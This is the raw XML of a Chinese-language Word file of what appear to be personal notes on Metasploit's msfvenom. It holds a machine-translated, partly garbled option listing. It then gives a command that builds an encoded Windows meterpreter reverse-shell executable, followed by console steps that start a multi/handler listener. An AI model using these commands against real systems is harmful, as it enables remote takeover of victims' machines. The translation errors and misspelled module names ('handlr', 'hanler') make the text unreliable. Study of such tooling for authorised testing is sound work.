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MsfVenom - a Metasploit 独立有效负载发生器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Also a replacement for msfpayload and msfencode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Usage: /usr/bin/msfvenom [options] &lt;var=val&gt;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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>选项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-p, --payload       &lt;payload&gt;    有效载荷使用。指定一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>有效的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自定义载荷      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--payload-options            列出有效载荷的标准选项</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-l, --list          [type]       列出一个模块类型。选项有：有效载荷，编码器，NOP，所有</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-n, --nopsled       &lt;length&gt;     在一个nopsled [长度]的大小对有效载荷</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    -f, --format        &lt;format&gt;     输出格式（使用-一个列表的帮助格式）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        --help-formats              列出可用的格式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    -e, --encoder       &lt;encoder&gt;    使用的编码器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    -a, --arch          &lt;arch&gt;       使用的架构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        --platform      &lt;platform&gt;   有效载荷平台</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        --help-platforms            list available平台</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    -s, --space         &lt;length&gt;     所得到的有效载荷的最大大小</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        --encoder-space &lt;length&gt;     编码的有效载荷的最大大小（默认值为S的值）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    -b, --bad-chars     &lt;list&gt;       人物避免实例列表：“x00xff”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    -i, --iterations    &lt;count&gt;      编码有效负载的次数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-c, --add-code      &lt;path&gt;       指定一个额外的Win32文件包括shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    -x, --template      &lt;path&gt;       指定要使用的自定义可执行文件作为模板</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-k, --keep                      保存模板行为，并将有效载荷注入一个新线程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-o, --out           &lt;path&gt;       保存有效载荷</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-v, --var-name      &lt;name&gt;       为特定的输出格式指定一个自定义变量名称</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>--smallest                   产生最小可能的有效载荷</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-h, --help                      显示此消息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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>实例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> （生成）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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Msfvenom -p  </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b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\x00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lhost=192.168.11.227 lport=443 -f exe &gt; payload.exe </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="42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Msf&gt; use exploit/multi/handlr     #用于反向监听的模块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Msf exploit（handler）&gt;set payload windows/meterpreter/reverse_tcp  #选择攻击模块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Payload =&gt; windows/meterpreter/reverse_tcp  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Msf exploit(hanler) &gt; show options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Msf exploit(hanler) &gt; set lhost 192.168.11.222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Msf exploit(hanler) &gt; set lport 443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Msf exploit(hanler) &gt; exploit    #启用监听 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2546AF"/>
    <w:rsid w:val="05AD5C5C"/>
    <w:rsid w:val="0B135F52"/>
    <w:rsid w:val="0D5652FE"/>
    <w:rsid w:val="109F77AF"/>
    <w:rsid w:val="13216EAD"/>
    <w:rsid w:val="17EE1B3E"/>
    <w:rsid w:val="247370EF"/>
    <w:rsid w:val="2F550D1E"/>
    <w:rsid w:val="319762E7"/>
    <w:rsid w:val="375123D8"/>
    <w:rsid w:val="4C216EFF"/>
    <w:rsid w:val="4E105A9B"/>
    <w:rsid w:val="545563CB"/>
    <w:rsid w:val="600E563B"/>
    <w:rsid w:val="623961A5"/>
    <w:rsid w:val="6624384F"/>
    <w:rsid w:val="67EA00DA"/>
    <w:rsid w:val="7BC47F1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</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-07T08:58:49Z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